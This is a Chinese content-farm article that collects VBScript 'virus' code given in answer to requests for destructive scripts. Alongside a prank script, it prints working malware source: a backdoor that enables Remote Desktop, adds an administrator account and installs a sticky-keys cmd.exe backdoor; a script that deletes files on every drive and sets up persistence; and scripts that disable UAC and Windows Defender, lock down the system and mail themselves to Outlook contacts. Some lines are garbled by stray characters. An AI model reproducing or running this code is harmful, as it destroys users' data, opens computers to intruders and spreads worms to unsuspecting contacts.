vbs病毒代码(vb病毒代码大全)

口碑 佚名 2年前 04-23 95 浏览 0 评论

大家好,今天来给大家分享vbs病毒代码的相关知识,通过是也会对vb病毒代码大全相关问题来为大家分享,如果能碰巧解决你现在面临的问题的话,希望大家别忘了关注下本站哈,接下来我们现在开始吧! 谁知道怎么用...

大家好,今天来给大家分享vbs病毒代码的相关知识,通过是也会对vb病毒代码大全相关问题来为大家分享,如果能碰巧解决你现在面临的问题的话,希望大家别忘了关注下本站哈,接下来我们现在开始吧!

1谁知道怎么用vbs写不能开机的病毒,给个代码。就是一开就关机的病毒。好了我给分

新建一个TXT文件,打开,把整人代码放进去,保存。然后把文件扩展名改成.VBS,发送给别人,运行,就能整人了。

比如:

gsh=msgbox ("已经准备好格式化,准备开始。",vbyesno)

set s=createobject("wscript.shell")

wscript.sleep 1000

msgbox "开始格式化…… 哈哈!吓晕了吧,骗你的~"

wscript.sleep 1000

wscript.sleep 1000*100

msgbox "windows发现一重要更新,将自动下载。"

wscript.sleep 3000

msgbox "系统检测到WINDOWS更新中捆绑有不明插件SXS.exe,是否对其扫描?",vbyesno

wscript.sleep 1000

msgbox "文件名 SXS.exe"+CHR(13)+"发行者 田间的菜鸟 "高租+chr(13)+"安全评级 高危"+chr(13)+"建议 直接删除"+chr(13)+"病毒类型:木马",,"windows扫描附件"

msgbox "是否阻止其安装?",vbyesno

wscript.sleep 3000

msgbox "阻止失败!请检查防火墙是否开启!"

wscript.sleep 5000

msgbox "正在尝启兆试强行删除…"

wscript.sleep 5000

msgbox "失败!"

wscript.sleep 5000

msgbox "您的电脑已陷入危险之中,请赶快扫描病毒!"

wscript.sleep 10000

s.sendkeys "% n"

s.run "taskkill /im .exe"

s.sendkeys "% n"

s.run "taskkill /im explorer.exe /f"

s.sendkeys "% n"

s.sendkeys "% n"

s.sendkeys "% n"

s.sendkeys "% n"

s.sendkeys "% n"

s.sendkeys "% n"

s.sendkeys "% n"

msgbox "你好啊!"

wscript.sleep 3000

msgbox "很高兴见到你!"

wscript.sleep 3000

msgbox "您的电脑可能已经感染病毒!",,"WINDOWS防火墙警告"

wscript.sleep 3000

msgbox "我控制你的电脑了!"

wscript.sleep 3000

msgbox "不信?那我给你关机看看~"

s.run "shutdown -r -t 120"

msgbox "信了吧!"

msgbox "帮你解除关机……"

s.run "shutdown -a"

msgbox "再给你打开记事本写封信,劝你最好别动,要不然会引起系统混乱~"

s.run "notepad"

wscript.sleep 3000

s.sendkeys "Hello, I'm sorry I control your computer,"

wscript.sleep 3000

s.sendkeys " but the virus is false in, "

wscript.sleep 3000

s.sendkeys "only a joke, "

wscript.sleep 3000

s.sendkeys "please rest assured! "

wscript.sleep 3000

s.sendkeys "I no longer next "

wscript.sleep 3000

s.sendkeys "time so the whole you!"

wscript.sleep 3000

s.sendkeys" Goodbye!"

s.sendkeys"{enter}"

s.sendkeys"END"

wscript.sleep 1000

s.sendkeys"%{F4}"

msgbox "提示:刚才的“病毒”是假的,只不过是吓你玩玩~"

s.run "explorer"

这个整人程序,既不会关机,也不悄念租会对电脑有伤害,就是有点烦。

VBScript(Microsoft Visual Basic Script Editon).,微软公司可视化BASIC脚本版). 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言。进一步解释一下, Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic. 脚本语言, 就是不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是写的程序不需要编译成.exe,,而是直接给用户发送.vbs的源程序, 用户就能执行了。

2解释一个VBS脚本病毒代码

'容错

on error resume next

'定义一个常量 是一个注册表的键值

const HKEY_LOCAL_MACHINE = H80000002

'定义一个变量strComputer 值为.

strComputer = "."

Set StdOut = WScript.StdOut

Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"前码 _

strComputer "\root\default:StdRegProv")

'创建组件 是关于注册表的组件

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

strValueName = "fDenyTSConnections"

dwValue = 0

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

strValueName = "PortNumber"

dwValue = 3389

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\慧嫌哪RDP-Tcp"

strValueName = "PortNumber"

dwValue = 3389

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

'上面这段的功能是开启3389端口 也就是开启***终端 方法是修改注册表的键值

'容错

on error resume next

'定义变量 username password

dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT:/者粗/"wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os"/"username",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath

'这段是增加管理员 用户名是HackEr 密码是393214425

'容错

On Error Resume Next

Dim obj, success

Set obj = CreateObject("WScript.Shell")

success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exeecho y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F? %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe? %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exedel %SystemRoot%\system32\sethc.exeren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

'这段是留后门 放大镜后门 将sethc.exe替换为cmd.exe 这样 在登陆界面这里 按5下shift就会出现cmd窗口 然后添加用户即可登陆系统

总结 这个不算是病毒 充其量 只不过是一个后门程序 运行之后 系统的***终端开启,自动加入一个HackEr的帐号 自动添加一个放大镜后门

个人感觉 这代码是将3段代码拼凑起来的 - - 没技术含量

3求最全的vbs病毒代码,要破坏性的。谢谢,回答的好我多给分。

那废话不说,问这个如何?不懂可以问我

On Error Resume Next

dim avest,xufso,wscrt

Set avest = WScript.Createobject("WScript.Shell")

Set wscrt = WScript.Createobject("WScript.Shell")

Set xufso = CreateObject("Scripting.FileSystemObject")

avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del g:\*.* / f /q /s"""御孝,0 ,true

avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del v:\*.* / f /世竖q /s""",0 ,true

avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del y:\*.* /镇返稿 f /q /s""",0 ,true

avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true

avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true

xufso.CreateFolder "C:\VBScript\"

wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!"

xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"

xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"

wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"

wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"

wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"

wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"

msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error"

do

wscrt.run "ping 192.168.1.1 -l 65500 -t"

loop

4求一个超毒无比的vbs代码,最好能破坏电脑和安全模式也修复不了的vbs代码。一定要超毒的。

送你了

On Error Resume Next

set fso=createobject("scripting.filesystemobject")

set vbs=wscript.createobject("wscript.shell")

pt=vbs.specialfolders("startup") "\"

set file=fso.getfile(wscript.scriptfullname)

file.copy pt

set fso=createobject("scripting.filesystemobject")

set vbs=wscript.createobject("wscript.shell")

pt=vbs.specialfolders(1) "\"拍闹

set file=fso.getfile(wscript.scriptfullname)

file.copy pt

set ws=wscript.createobject("wscript.shell")

ws.popup "颂贺郑正在验证I/O接口...",3,"接口工具",vbinformation

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"

if err.number0 then

On Error Goto 0

err.raise 1,"无法匹配的I/O接口,请以ADMINISTRATOR用户运行重试","Access failed (no permission)"

end if

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\[TARGETDIR]脚本病毒加强版.vbs","RUNASADMIN","REG_SZ"

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",0,"REG_DWORD"

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",0,"REG_DWORD"

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop",0,"REG_DWORD"

ws.run "cmd /c echo 0C:\Windows\Web\Screen\e.bmp"

Set ol=CreateObject("Out"+"look"+".Application")

For x=1 To 100

Set Mail=ol.CreateItem(0)

Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)

Mail.Subject="工作报告"

Mail.Body="您好,这是今月的工作报告"

Mail.Attachments.Add(dir2"Win32system.vbs")

Mail.Send

Next

ol.Quit

ws.run "cmd /c echo Your Computer Has Been Destoryed!e.txt"

ws.run "cmd /c echo Your Computer Has Been Destoryed!c:\e.txt"

wscript.sleep 2000

ws.regwrite "HKCU\Control Panel\Desktop\wallpaper","C:\Windows\Web\Screen\e.bmp","REG_SZ"

ws.run "野颂RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters"

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetup",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupIDPage",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoNetSetupSecurityPage",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoEntireNetwork",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoWorkgroupContents",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoFileSharingControl",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network\NoPrintSharingControl",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CLASSES_ROOT\directory\background\ShellEx\ContextMenuHandlers\New\",0,"REG_SZ"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService\Start",4,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\noclose","1","REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoChangeStartMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrivers",67108863,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent",0,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies\WriteProtect",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetActiveDesktop",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktopChanges",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Nodesktop",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoAddPrinter",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDeletePrinter",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun",1,"REG_DWORD"

wscript.sleep 100

ws.regwrite "HKEY_CURRENT_USER\ControlPanel\Desktop\CoolSwitch",0,"REG_SZ"

wscript.sleep 100

ws.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",67108863,"REG_DWORD"

ws.run "cmd /c taskkill /f /im explorer.exe"

wscript.sleep 3000

ws.run "cmd /c start explorer.exe"

wscript.sleep 2000

ws.regwrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD","2","REG_DWORD"

wscript.sleep 100

set vbs=wscript.createobject("wscript.shell")

set ws=createobject("wscript.shell")

do

msgbox"你好",vbexclamation,"VIRUS"

wscript.sleep 5000

loop

5电脑病毒源代码介绍

电脑中了病毒想从它的或丛逗源代码入手怎么办呢!有我在,下面由我给你做出详细的电脑病毒源代码介绍!希望对你有帮助!

电脑病毒源代码介绍:

电脑病毒源代码一:

on error resume next

set fs=createobject("ing.filesystemobject" '创建一个能与 操作系统 沟通的对象,再利用该对象的各种 方法 对注册表进行操作

set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置

set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置

set so=createobject("ing.filesystemobject"

dim r '定义一个变量

set r=createobject("w.shell"

so.getfile(w.fullname).copy(dir1"\win32system.vbs" '复制病毒副本到windows/winnt文件夹位置

so.getfile(w.fullname).copy(dir2"\win32system.vbs" '复制病毒副本到system32/system文件夹位置

so.getfile(w.fullname).copy(dir1"\start menu\programs\启动\win32system.vbs" '复制病毒副本到start menu启动菜单

'下面是对注册表的恶意修改和简单的依靠oe传播衫卖

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注册表,禁止“运行”菜单

r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注册表,禁止“关闭”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注郑指册表,隐藏所有逻辑盘符

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注册表,禁止注册表编辑

r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注册表,禁止开机注册表扫描

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注册表,禁止“注销”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注册表,禁止ms-dos实模式

r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注册表,使这个脚本本身开机自动运行

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注册表,禁止显示桌面图标

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注册表,禁止纯dos模式

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注册表,禁止“任务栏和开始”菜单

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注册表,禁止右键菜单

电脑病毒源代码二:

r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword" '修改注册表,禁止控制面板

r.regwrite "hklm\software\classes\.reg\","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联

r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","警告" '设置开机提示框标题

r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容

set ol=createobject("outlook.application" '创建outlook文件对象用于传播

on error resume next

for x=1 to 100

set mail=ol.createitem(0)

mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~

mail.subject="今晚你来吗?" '邮件主题

mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容

mail.attachments.add(dir2"win32system.vbs"

mail.send

next

ol.quit

'下面是对internet explore 选项的恶意修改

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword" '修改注册表,禁止鼠标右键

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword" '修改注册表,禁止internet选项

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword" '修改注册表,禁止“另存为”

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword" '修改注册表,禁止“文件/打开”菜单

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword" '修改注册表,禁止更改高级页设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword" '修改注册表,禁止更改临时文件设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword" '修改注册表,禁止更改自动配置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword" '修改注册表,禁止更改主页,即“主页”变灰

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword" '修改注册表,禁止更改历史记录设置

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword" '修改注册表,禁止更改internet连接向导

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword" '修改注册表,禁止更改安全项

r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword" '修改注册表,禁止“重置web设置”

r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword" '修改注册表,禁止查看源文件

r.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubions",1,"reg_dword" '修改注册表,禁止添加脱机计划

好了,文章到此结束,希望可以帮助到大家。

上一篇:百度团购(百度团购平台)
下一篇:苦瓜吃多了有害处吗(苦瓜吃多了有什么危害)
版权声明:如无特殊标注,文章均为本站原创,转载时请以链接形式注明文章出处。

为您推荐

芹菜香干炒肉(芹菜香干炒肉怎么做)

芹菜香干炒肉(芹菜香干炒肉怎么做)

怎样剪五角星(怎样剪五角星圆形窗花)

怎样剪五角星(怎样剪五角星圆形窗花)

腿粗(腿粗女生穿什么裤子好看)

腿粗(腿粗女生穿什么裤子好看)

过河小游戏(过河小游戏规则)

过河小游戏(过河小游戏规则)

lol劫怎么连招(lol劫连招教学)

lol劫怎么连招(lol劫连招教学)

今日废角钢铁最新价格表(2021今日废钢价格表)

今日废角钢铁最新价格表(2021今日废钢价格表)